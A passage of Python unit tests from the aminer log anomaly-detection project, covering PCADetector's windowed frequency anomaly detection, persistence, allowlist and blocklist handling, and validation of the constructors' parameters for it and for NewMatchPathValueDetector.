self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=set()) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=True) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set()) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set()) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=set()) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/PCADetectorTest.py000066400000000000000000001040761500476301700271220ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.PCADetector import PCADetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class PCADetectorTest(TestBase): """Unittests for the PCADetector.""" def test1receive_atom(self): """This test case checks the normal detection of value frequencies using PCA.""" t = time.time() expected_string = '%s PCA anomaly detected\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" # Prepare log atoms that represent different amounts of values a, b over time # Five time windows are used. The first three time windows are used for initializing # the count matrix. The fourth window is used to verify the anomaly score computation. # The fifth time window is only used to mark the end of the fourth time window. # The following log atoms are created: # window 1: # value a: 2 times # value b: 1 time # window 2: # value a: 1 times # value b: 1 time # window 3: # value a: 1 time # value b: 0 times # window 4: # value a: 4 time # value b: 1 time # window 5: # value a: 1 time # Start of window 1: log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+1, None) log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+3, None) log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+7, None) # Start of window 2: log_atom4 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+13, None) log_atom5 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+15, None) # Start of window 3: log_atom6 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+27, None) # Start of window 4: log_atom7 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+33, None) log_atom8 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+34, None) log_atom9 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+36, None) log_atom10 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+37, None) log_atom11 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+38, None) # Start of window 5: log_atom12 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+45, None) # Initialize detector for analyzing values in one path in time windows of 10 seconds pcad = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False) # Forward log atoms to detector # Log atoms of windows 1 to 3 build up the count matrix # Input: log atoms of windows 1 to 3 # Expected output: No anomalies reported pcad.receive_atom(log_atom1) pcad.receive_atom(log_atom2) pcad.receive_atom(log_atom3) pcad.receive_atom(log_atom4) pcad.receive_atom(log_atom5) pcad.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") # Log atoms of window 4 build the count vector for that window # Input: b; log atoms of window 4 # Expected output: No anomalies reported pcad.receive_atom(log_atom7) pcad.receive_atom(log_atom8) pcad.receive_atom(log_atom9) pcad.receive_atom(log_atom10) pcad.receive_atom(log_atom11) self.assertEqual(self.output_stream.getvalue(), "") # At this point, the event count matrix contains the counts from the first three windows self.assertEqual(pcad.event_count_matrix, [{"/value": {"a": 2, "b": 1}}, {"/value": {"a": 1, "b": 1}}, {"/value": {"a": 1, "b": 0}}]) # The count vector contains the counts of the fourth window self.assertEqual(pcad.event_count_vector, {"/value": {"a": 4, "b": 1}}) # Log atom of window 5 triggers comparison of count vector from window 4 with PCA # Input: log atoms of window 5 # Expected output: Anomaly reported on count vector of fourth window pcad.receive_atom(log_atom12) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t+45).strftime(dtf), pcad.__class__.__name__, 1, "a")) # Event count matrix is shifted by 1 so that window 0 is removed and window 4 is appended self.assertEqual(pcad.event_count_matrix, [{"/value": {"a": 1, "b": 1}}, {"/value": {"a": 1, "b": 0}}, {"/value": {"a": 4, "b": 1}}]) # stop_learning_time pcad = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(pcad.receive_atom(log_atom1)) log_atom2.atom_time = t + 99 self.assertTrue(pcad.receive_atom(log_atom2)) self.assertTrue(pcad.learn_mode) log_atom1.atom_time = t + 102 self.assertTrue(pcad.receive_atom(log_atom1)) self.assertFalse(pcad.learn_mode) # stop_learning_no_anomaly_time pcad = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(pcad.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(pcad.receive_atom(log_atom1)) self.assertTrue(pcad.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(pcad.receive_atom(log_atom2)) self.assertTrue(pcad.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(pcad.receive_atom(log_atom3)) self.assertTrue(pcad.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(pcad.receive_atom(log_atom1)) self.assertFalse(pcad.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" pcad = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False) t = time.time() pcad.next_persist_time = t + 400 self.assertEqual(pcad.do_timer(t + 200), 200) self.assertEqual(pcad.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(pcad.do_timer(t + 999), 1) self.assertEqual(pcad.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. pcad = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False) analysis = "Analysis.%s" self.assertRaises(Exception, pcad.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The PCADetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, pcad.allowlist_event, analysis % pcad.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(pcad.allowlist_event(analysis % pcad.__class__.__name__, "/s1", None), "Allowlisted path %s in %s." % ("/s1", analysis % pcad.__class__.__name__)) self.assertEqual(pcad.constraint_list, ["/s1"]) pcad.learn_mode = False self.assertEqual(pcad.allowlist_event(analysis % pcad.__class__.__name__, "/d1", None), "Allowlisted path %s in %s." % ("/d1", analysis % pcad.__class__.__name__)) self.assertEqual(pcad.constraint_list, ["/s1", "/d1"]) def test4blocklist_event(self): """Test if the blocklist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. pcad = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False) analysis = "Analysis.%s" self.assertRaises(Exception, pcad.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The PCADetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, pcad.blocklist_event, analysis % pcad.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(pcad.blocklist_event(analysis % pcad.__class__.__name__, "/s1", None), "Blocklisted path %s in %s." % ("/s1", analysis % pcad.__class__.__name__)) self.assertEqual(pcad.ignore_list, ["/s1"]) pcad.learn_mode = False self.assertEqual(pcad.blocklist_event(analysis % pcad.__class__.__name__, "/d1", None), "Blocklisted path %s in %s." % ("/d1", analysis % pcad.__class__.__name__)) self.assertEqual(pcad.ignore_list, ["/s1", "/d1"]) def test5persistence(self): """Test the do_persist and load_persistence_data methods.""" t = time.time() log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+1, None) log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+3, None) log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+7, None) log_atom4 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+13, None) log_atom5 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+15, None) log_atom6 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+27, None) log_atom7 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+33, None) log_atom8 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+34, None) log_atom9 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+36, None) log_atom10 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+37, None) log_atom11 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+38, None) log_atom12 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+45, None) pcad = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False) pcad.receive_atom(log_atom1) pcad.receive_atom(log_atom2) pcad.receive_atom(log_atom3) pcad.receive_atom(log_atom4) pcad.receive_atom(log_atom5) pcad.receive_atom(log_atom6) pcad.receive_atom(log_atom7) pcad.receive_atom(log_atom8) pcad.receive_atom(log_atom9) pcad.receive_atom(log_atom10) pcad.receive_atom(log_atom11) pcad.receive_atom(log_atom12) pcad.do_persist() with open(pcad.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[{"string:/value": {"string:a": 1, "string:b": 1}}, {"string:/value": {"string:a": 1, "string:b": 0}}, {"string:/value": {"string:a": 4, "string:b": 1}}]') self.assertEqual(pcad.event_count_matrix, [{"/value": {"a": 1, "b": 1}}, {"/value": {"a": 1, "b": 0}}, {"/value": {"a": 4, "b": 1}}]) pcad.event_count_matrix = [] pcad.load_persistence_data() self.assertEqual(pcad.event_count_matrix, [{"/value": {"a": 1, "b": 1}}, {"/value": {"a": 1, "b": 0}}, {"/value": {"a": 4, "b": 1}}]) other = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False) self.assertEqual(other.event_count_matrix, pcad.event_count_matrix) def test6validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(ValueError, PCADetector, self.aminer_config, [""], [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, None, [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, "", [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, b"Default", [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, True, [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, 123, [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, 123.3, [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, (), [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, set(), [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], ["default"], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], None, 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], "", 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], b"Default", 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], True, 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], 123, 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], 123.3, 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], {"id": "Default"}, 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], (), 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], set(), 10, 2, 0.9, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 0, 2, 0.9, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], -1, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], ["default"], 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], None, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], "", 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], b"Default", 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], True, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], {"id": "Default"}, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], (), 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], set(), 2, 0.9, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 0, 0.9, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, -1, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, ["default"], 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, None, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, "", 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, b"Default", 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, True, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, {"id": "Default"}, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, (), 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, set(), 0.9, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, -1, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 1.1, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, b"Default", 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, "123", 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, {"id": "Default"}, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, ["Default"], 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, [], 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, (), 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, set(), 3) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0, 3) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.5, 3) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 1, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, -1) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 0) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, b"Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, "123") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, {"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, ["Default"]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, []) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, ()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 100) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id="") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=None) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=b"Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=True) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=123) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=123.22) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=["Default"]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=[]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id="Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=b"True") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode="True") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=123) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=123.22) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=["Default"]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=[]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=None) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=b"True") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline="True") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=123) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=123.22) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=["Default"]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=[]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=True) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=[""]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list="") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=b"Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=True) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=123) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=123.3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=[]) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=None) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=[""]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list="") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=b"Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 